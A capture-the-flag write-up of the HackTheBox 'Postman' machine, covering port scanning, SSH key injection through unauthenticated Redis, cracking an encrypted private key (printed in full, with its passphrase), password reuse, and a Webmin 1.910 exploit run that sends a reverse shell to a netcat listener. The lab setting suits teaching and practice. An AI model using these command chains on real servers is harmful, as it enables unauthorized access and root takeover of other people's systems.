Welcome to the Postman writeup from HTB
I hope you enjoy reading it. Any feedback will be appreciated! @x4v1l0k
Postman
tags: HTB, Easy, Linux
Platform: Hackthebox
Difficulty: Easy
OS: Linux
Enumeration
Nmap
To get started, we run a quick scan of all TCP ports.
$ nmap -Pn -T4 -p- postman.htb
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-27 18:33 CEST
Nmap scan report for postman.htb (10.10.10.160)
Host is up (0.087s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
6379/tcp open redis
10000/tcp open snet-sensor-mgmt
Nmap done: 1 IP address (1 host up) scanned in 29.58 seconds
Now that we know the open ports, let's scan them in depth.
$ nmap -Pn -A -p 22,80,6379,10000 --script http-enum postman.htb
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-27 18:44 CEST
Nmap scan report for postman.htb (10.10.10.160)
Host is up (0.086s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-enum:
| /css/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
| /images/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
| /js/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|_ /upload/: Potentially interesting directory w/ listing on 'apache/2.4.29 (ubuntu)'
|_http-server-header: Apache/2.4.29 (Ubuntu)
6379/tcp open redis Redis key-value store 4.0.9
10000/tcp open http MiniServ 1.910 (Webmin httpd)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.2 - 4.9 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 3.16 (93%), Linux 3.18 (93%), ASUS RT-N56U WAP (Linux 3.4) (93%), Android 4.2.2 (Linux 3.4) (93%), Linux 2.6.32 (92%), Linux 3.1 - 3.2 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 22/tcp)
HOP RTT ADDRESS
1 86.00 ms 10.10.14.1
2 86.33 ms postman.htb (10.10.10.160)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.25 seconds
As we can see, the server is running a Redis service (4.0.9). Redis ships with no authentication unless requirepass is configured, so we will try to connect without credentials and see if it answers an ECHO.
$ redis-cli -h 10.10.10.160
10.10.10.160:6379> ECHO HELLO
"HELLO"
10.10.10.160:6379>
Nice! We can execute commands without authentication.
Exploitation
Redis-cli
Let's use this to inject an SSH public key. The trick is to make Redis dump its database into the redis user's authorized_keys file: the RDB dump is binary, but sshd simply skips lines it cannot parse, so a value padded with newlines on both sides survives as a valid key line.
The first thing we have to do is load our id_rsa.pub file into the server's memory as a key value, wrapped in blank lines.
$ (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") | redis-cli -h 10.10.10.160 -x set x4v1l0k
OK
Now we point Redis's working directory at the redis user's .ssh directory, so that the dump is written there.
$ redis-cli -h 10.10.10.160
10.10.10.160:6379> config set dir /home/redis/.ssh
(error) ERR Changing directory: Permission denied
Well, the redis user has no /home/redis directory. On Debian/Ubuntu packages its home is /var/lib/redis, so let's try that path instead.
$ redis-cli -h 10.10.10.160
10.10.10.160:6379> config set dir /var/lib/redis/.ssh
OK
10.10.10.160:6379> config set dbfilename authorized_keys
OK
10.10.10.160:6379> save
OK
10.10.10.160:6379> quit
Great, with the dump filename set to authorized_keys and a SAVE issued, we should now be able to connect via SSH as redis with the matching private key.
$ ssh redis@10.10.10.160 -i id_rsa
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
Last login: Mon Aug 26 03:04:25 2019 from 10.10.10.1
redis@Postman:~$
Post exploitation
Privilege escalation: redis to Matt
Enumeration
Linpeas
[...]
[+] Backup files
-rwxr-xr-x 1 Matt Matt 1743 Aug 26 2019 /opt/id_rsa.bak
[...]
Running linpeas turns up a world-readable backup of Matt's id_rsa in /opt.
redis@Postman:/tmp$ cat /opt/id_rsa.bak
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C
JehA51I17rsCOOVqyWx+C8363IOBYXQ11Ddw/pr3L2A2NDtB7tvsXNyqKDghfQnX
cwGJJUD9kKJniJkJzrvF1WepvMNkj9ZItXQzYN8wbjlrku1bJq5xnJX9EUb5I7k2
7GsTwsMvKzXkkfEZQaXK/T50s3I4Cdcfbr1dXIyabXLLpZOiZEKvr4+KySjp4ou6
cdnCWhzkA/TwJpXG1WeOmMvtCZW1HCButYsNP6BDf78bQGmmlirqRmXfLB92JhT9
1u8JzHCJ1zZMG5vaUtvon0qgPx7xeIUO6LAFTozrN9MGWEqBEJ5zMVrrt3TGVkcv
EyvlWwks7R/gjxHyUwT+a5LCGGSjVD85LxYutgWxOUKbtWGBbU8yi7YsXlKCwwHP
UH7OfQz03VWy+K0aa8Qs+Eyw6X3wbWnue03ng/sLJnJ729zb3kuym8r+hU+9v6VY
Sj+QnjVTYjDfnT22jJBUHTV2yrKeAz6CXdFT+xIhxEAiv0m1ZkkyQkWpUiCzyuYK
t+MStwWtSt0VJ4U1Na2G3xGPjmrkmjwXvudKC0YN/OBoPPOTaBVD9i6fsoZ6pwnS
5Mi8BzrBhdO0wHaDcTYPc3B00CwqAV5MXmkAk2zKL0W2tdVYksKwxKCwGmWlpdke
P2JGlp9LWEerMfolbjTSOU5mDePfMQ3fwCO6MPBiqzrrFcPNJr7/McQECb5sf+O6
jKE3Jfn0UVE2QVdVK3oEL6DyaBf/W2d/3T7q10Ud7K+4Kd36gxMBf33Ea6+qx3Ge
SbJIhksw5TKhd505AiUH2Tn89qNGecVJEbjKeJ/vFZC5YIsQ+9sl89TmJHL74Y3i
l3YXDEsQjhZHxX5X/RU02D+AF07p3BSRjhD30cjj0uuWkKowpoo0Y0eblgmd7o2X
0VIWrskPK4I7IH5gbkrxVGb/9g/W2ua1C3Nncv3MNcf0nlI117BS/QwNtuTozG8p
S9k3li+rYr6f3ma/ULsUnKiZls8SpU+RsaosLGKZ6p2oIe8oRSmlOCsY0ICq7eRR
hkuzUuH9z/mBo2tQWh8qvToCSEjg8yNO9z8+LdoN1wQWMPaVwRBjIyxCPHFTJ3u+
Zxy0tIPwjCZvxUfYn/K4FVHavvA+b9lopnUCEAERpwIv8+tYofwGVpLVC0DrN58V
XTfB2X9sL1oB3hO4mJF0Z3yJ2KZEdYwHGuqNTFagN0gBcyNI2wsxZNzIK26vPrOD
b6Bc9UdiWCZqMKUx4aMTLhG5ROjgQGytWf/q7MGrO3cF25k1PEWNyZMqY4WYsZXi
WhQFHkFOINwVEOtHakZ/ToYaUQNtRT6pZyHgvjT0mTo0t3jUERsppj1pwbggCGmh
KTkmhK+MTaoy89Cg0Xw2J18Dm0o78p6UNrkSue1CsWjEfEIF3NAMEU2o+Ngq92Hm
npAFRetvwQ7xukk0rbb6mvF8gSqLQg7WpbZFytgS05TpPZPM0h8tRE8YRdJheWrQ
VcNyZH8OHYqES4g2UF62KpttqSwLiiF4utHq+/h5CQwsF+JRg88bnxh2z2BD6i5W
X+hK5HPpp6QnjZ8A5ERuUEGaZBEUvGJtPGHjZyLpkytMhTjaOrRNYw==
-----END RSA PRIVATE KEY-----
$ ssh matt@10.10.10.160 -i id_rsa
load pubkey "id_rsa": invalid format
Enter passphrase for key 'id_rsa':
The "load pubkey" warning only means ssh could not find an id_rsa.pub next to the key. The passphrase prompt (and the DEK-Info header in the file) show the key is encrypted, so let's try to recover the passphrase with john.
$ ssh2john id_rsa > id_rsa_hash
$ john id_rsa_hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 8 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
computer2008 (id_rsa)
Warning: Only 2 candidates left, minimum 8 needed for performance.
1g 0:00:00:05 DONE (2021-06-27 20:38) 0.1901g/s 2726Kp/s 2726Kc/s 2726KC/sa6_123..*7¡Vamos!
Session completed
When we connect by SSH, the key accepts the passphrase computer2008, so it is correct, but the server closes the connection immediately: this key does not get Matt an SSH session.
$ ssh matt@10.10.10.160 -i id_rsa
load pubkey "id_rsa": invalid format
Enter passphrase for key 'id_rsa':
Connection closed by 10.10.10.160 port 22
Passwords are often reused, so let's try the passphrase as Matt's local password from our redis shell.
redis@Postman:/tmp$ su Matt
Password:
Matt@Postman:/tmp$ id
uid=1000(Matt) gid=1000(Matt) groups=1000(Matt)
And now we can read the user flag.
Matt@Postman:/tmp$ cd
Matt@Postman:~$ cat user.txt
CENSORED_FLAG
Privilege escalation: Matt to root
Enumeration
Pspy
Running pspy shows that Webmin's miniserv.pl is running as root (UID=0).
2021/06/27 19:52:27 CMD: UID=0 PID=732 | /usr/bin/perl /usr/share/webmin/miniserv.pl /etc/webmin/miniserv.conf
Browsing to the Webmin panel at https://postman.htb:10000/sysinfo.cgi?xnavigation=1 confirms the version is 1.910, matching the MiniServ 1.910 banner nmap reported.
A quick search for vulnerabilities in this version turns up a Python exploit hosted in this GitHub repository.
Time to exploit. The script needs valid Webmin credentials (Matt's password works here too), and it spawns a reverse shell, so start a netcat listener before running it.
$ python exp.py --rhost 10.10.10.160 --rport 10000 --lhost 10.10.14.29 --lport 8787 -u Matt -p computer2008 -s yes
****************************** Webmin 1.910 Exploit By roughiz*******************************
*********************************************************************************************
*********************************************************************************************
*********************************************************************************************
****************************** Retrieve Cookies sid *****************************************
********** [+] [Exploit] The Cookie is 132613f2a51c54ed95206d3ec322389d
********************************************************************************************
****************************** Create payload and Exploit ***********************************
********** [+] [Exploit] Verify you nc listener on port 8787 for the incomming reverse shell
$ nc -lnvp 8787
listening on [any] 8787 ...
connect to [10.10.14.29] from (UNKNOWN) [10.10.10.160] 49284
id
uid=0(root) gid=0(root) groups=0(root)
cat /root/root.txt
CENSORED_FLAG
We are root and can read the root flag.